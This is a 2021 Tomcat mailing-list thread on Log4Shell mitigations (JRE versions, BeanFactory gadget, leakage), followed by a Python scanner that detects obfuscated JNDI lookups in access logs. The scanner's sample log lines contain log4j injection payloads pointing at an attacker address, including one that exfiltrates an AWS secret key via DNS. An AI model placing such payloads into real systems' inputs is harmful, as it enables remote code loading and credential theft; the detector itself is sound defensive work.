There have been multiple patches for RMI and LDAP over time in Java. 

The first article states which attack (of the ones the researcher analyzed) 
was possible in which version.

https://www.veracode.com/blog/research/exploiting-jndi-injections-java

https://github.com/mbechler/marshalsec/

If the system is not explicitly configured to allow remote class loading via 
RMI from everywhere, the only successful attack (= running code on the server) 
I found is leveraging Tomcat's BeanFactory. The latter works with any recent 
Tomcat and Java.

I understand Mark's point that this is caused by the use of log4j and not by 
Tomcat; on the other hand, it would be way harder to leverage the attack if the 
BeanFactory could be modified.

> On 13.12.2021 at 16:03, Juri Berlanda <juri.berla...@tuwien.ac.at> wrote:
> 
> Hi,
> 
> we were affected - we use an AccessLogValve, which logs to Log4j2 and we use 
> Log4j as java.util.logging LogManager. We already patched, but only on 
> Saturday.
> 
> In any case: in a lot of places I saw "recent JRE versions have a mitigation 
> in place", but I can't seem to find which JRE version introduced which 
> mitigation. Can anybody here point me to where I can find that information? 
> Googling for this only seems to bring up everybody's security advisories, but 
> nobody seems to bother to state exact JRE versions.
> 
> Cheers,
> 
> Juri
> 
> On 12/13/21 2:13 PM, Christopher Schultz wrote:
>> Tim,
>> 
>> Adding to what others have posted...
>> 
>> On 12/13/21 03:57, Scott,Tim wrote:
>>> Suspecting that someone here knows the answer immediately, I thought I’d 
>>> ask.
>>> 
>>> If you do not know the answer, please don’t spend any time investigating: 
>>> I’ll do that later today and update everyone whether or not I find an 
>>> answer.
>>> 
>>> Our security team advise that “Certain versions of the Java Development Kit 
>>> remove the LDAP attack vector”.
>>> 
>>> My question is: Does this removal occur during compile time or runtime?
>> 
>> Runtime. You can even re-enable the vulnerability if you want :)
>> 
>> It's worth repeating what David Weisgerber said in his reply: even if the 
>> runtime JDK/JRE provides a mitigation of sorts, you may still be vulnerable 
>> through other means (aka "JNDI gadgets").
>> 
>> There is also a risk of information leakage which does NOT rely on the use 
>> of LDAP connections.
>> 
>> Your best course of action would be to upgrade log4j if possible, or use one 
>> of the several other mitigations available for recent versions. If you 
>> aren't running a recent version, RUN ONE.
>> 
>> -chris
>> 
>> ---------------------------------------------------------------------
>> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
>> For additional commands, e-mail: users-h...@tomcat.apache.org
> 
> 


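The thread above concerns JNDI lookup strings reaching log4j through Tomcat (Juri mentions an AccessLogValve logging to Log4j2) and Chris's remark that information can leak without any LDAP connection. As an added example, not code from the thread, from Tomcat or from log4j, here is a Python scanner for Tomcat-style access log lines that undoes the lookup nesting attackers used to evade a plain `${jndi:` grep (`${lower:j}`, `${upper:n}`, `${::-d}`) and reports the scheme and target of each JNDI lookup, flagging targets that themselves carry another lookup (the exfiltration pattern that needs no LDAP callback). The log lines and the 198.51.100.7 address are constructed; the lookup semantics (`lower`, `upper`, `:-` default) follow log4j 2.x's `StrSubstitutor`, and `env`/`sys` values are assumed unresolvable offline.

```python
"""Offline scanner for log4j 2.x JNDI lookups in log lines (added example)."""
import re

# Innermost ${...}: its body contains no further '$', '{' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# Lookups that are kept are wrapped in sentinels so _INNER does not match
# them again; they are turned back into "${" / "}" at the end.
_OPEN, _CLOSE = "\x01", "\x02"


def _resolve(expr: str) -> str:
    """Resolve one innermost lookup body roughly as log4j would.

    Only lookups whose result is predictable offline (lower, upper, the
    ':-' default) are expanded; jndi is kept verbatim (it is what we hunt),
    env/sys/ctx/... are kept because their value is unknown offline.
    """
    name, has_default, default = expr.partition(":-")
    prefix, _, arg = name.partition(":")
    prefix = prefix.lower()
    if prefix == "jndi":
        return _OPEN + name + _CLOSE
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    if has_default:          # ${::-j}, ${env:NOPE:-j}: assumed to fall back
        return default
    return _OPEN + name + _CLOSE


def normalize(s: str) -> str:
    """Collapse nested lookups until no innermost one changes anything."""
    prev = None
    while prev != s:
        prev = s
        s = _INNER.sub(lambda m: _resolve(m.group(1)), s)
    return s.replace(_OPEN, "${").replace(_CLOSE, "}")


_JNDI_START = re.compile(r"\$\{jndi:", re.IGNORECASE)  # prefixes are case-insensitive


def _matching_close(s: str, start: int) -> int:
    """Index of the '}' closing the '${' at `start`, honouring nesting; -1 if none."""
    depth, i = 0, start
    while i < len(s):
        if s.startswith("${", i):
            depth += 1
            i += 2
            continue
        if s[i] == "}":
            depth -= 1
            if depth == 0:
                return i
        i += 1
    return -1


def find_jndi(line: str) -> list:
    """One finding per JNDI lookup in `line`, after de-obfuscation."""
    norm = normalize(line)
    findings = []
    for m in _JNDI_START.finditer(norm):
        end = _matching_close(norm, m.start())
        if end < 0:
            continue                      # unterminated: log4j would not expand it
        target = norm[m.end():end]
        findings.append({
            "scheme": target.partition(":")[0].lower(),  # ldap, rmi, dns, ...
            "target": target,
            "nested_lookup": "${" in target,  # e.g. ${env:...} smuggled out via DNS
            "normalized": norm[m.start():end + 1],
        })
    return findings


def scan(lines) -> list:
    """Scan an iterable of log lines; 1-based line numbers in the result."""
    return [{"line": n, **f} for n, line in enumerate(lines, 1) for f in find_jndi(line)]


# Constructed Tomcat access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Dec/2021:14:13:01 +0100] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Dec/2021:14:13:07 +0100] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [13/Dec/2021:14:13:09 +0100] "GET /${${lower:j}${upper:n}${::-d}i:rmi://198.51.100.7:1099/x} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [13/Dec/2021:14:13:11 +0100] "GET / HTTP/1.1" 200 612 "-" "${jndi:dns://${env:AWS_SECRET_ACCESS_KEY}.198.51.100.7/a}"',
    '10.0.0.9 - - [13/Dec/2021:14:13:12 +0100] "GET / HTTP/1.1" 200 612 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://198.51.100.7:1389/b}"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        leak = " (nested lookup: possible exfiltration)" if hit["nested_lookup"] else ""
        print(f'line {hit["line"]}: {hit["scheme"]} -> {hit["normalized"]}{leak}')
```

Run it against `access_log` with `scan(open("access_log"))`; the `rmi` and `dns` hits are the reason a grep for `ldap://` alone, or a mitigation that only covers LDAP, is not sufficient.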
